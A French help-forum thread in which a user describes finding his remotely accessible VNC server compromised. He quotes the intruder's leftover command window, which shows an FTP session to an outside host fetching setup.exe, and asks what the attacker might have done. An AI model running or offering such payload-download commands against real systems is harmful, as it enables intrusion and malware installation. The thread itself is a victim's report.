Rechercher : dans
Par :

Serveur VNC Hacké, dois-je m'inquiter ?

Dernière réponse le 23 nov 2008 à 17:48:32 tibo, le 22 nov 2008 à 21:04:49 
 Signaler ce message aux modérateurs

Bonjour,

J'utilise régulièrement un serveur VNC pour communiquer avec mon 2eme PC (n'étant pas chez moi).
L'autre jour en me connectant, je ne retrouve pas l'écran que j'avais laisser :
1- le gestionnaire des tache était ouvert a l'onglet processus
2- un cmd était ouvert :
tcp> legenda.hostbot.com 21
conect legenda ******** (mot de passe visible)
tcp> binari
non conecté
tcp>passive
non conecté
tcp>get setup.exe
tcp>by
3- un message windows était ouvert, m'indiquant je devait"installer les nouveau logiciel avec le panneau de configuration

je vous invite regarder la page http://legenda.hostbot.com

Mon anti-virus (Kaspersky) evidement a jours n'affichait absolument rien, il n'est pourtant pas configurable depuis un client VNC (on ne peut pas cliquer sur la fenêtre)

Mit a part le fait que le mec ai pu fouiller dans mon PC et récupérer des infos, Quelqu'un pourait-il m'expliquer ce qu'il a bien pu faire , et dois-je m'attendre a des attaque virus ou autre ?

merci.

Configuration: Windows XP
Firefox 3.0.2

Meilleures réponses pour « Serveur VNC Hacké, dois je m'inquiter ? » dans :
Accéder à distance à sa machine (VNC+ssh) Voir L'astuce suivante vous permettra d'accéder à distance à votre machine de manière graphique. Nous allons utiliser le serveur VNC inclu dans Ubuntu (Vino) en le sécurisant par ssh. Vous pourrez alors accéder à distance à votre PC avec ssh et vnc...
[VNC] Se faire aider à distance VoirVNC Le logiciel VNC (Virtual Network Computing) vous permettra de vous faire aider à distance sur votre machine. Démarrez le serveur, convenez d'un mot de passe avec la personne qui a accepté de vous aider, et donnez-lui votre adresse IP. Elle...
Télécharger Tight VNC VoirVNC (Virtual Network Computing) est une application client/serveur permettant d'accéder graphiquement à une machine distante à travers les réseaux, quelle que soit son système d'exploitation. Grâce à VNC, il est possible d'accéder à une machine de...
Télécharger Real VNC VoirRealVNC est un client VNC (virtual network computing) permettant de prendre la main à distance sur des ordinateurs, pour peu qu'un serveur VNC soit lancé sur les machines distantes. La présente version de VNC est une version gratuite mais limitée....

1

Killer78, le 22 nov 2008 à 21:07:16

Bonjour ,

Dis-tu vraiment qu'il a été hacké , ou seulement un programme a été "blesser" ?
Je vous aide , en tant qu'ange des jeunes de problèmes .

Répondre à Killer78

2

tibo, le 23 nov 2008 à 00:17:03

Ba .. par Hacké j'entend que la personne c'est conecté a mon serveur, et a donc controlé mon PC, ensuite il a trafiqué je ne sais quoi dessu.
que signifie un programme "blesser" ?

Répondre à tibo

3

tibo, le 23 nov 2008 à 17:48:32

Up

Répondre à tibo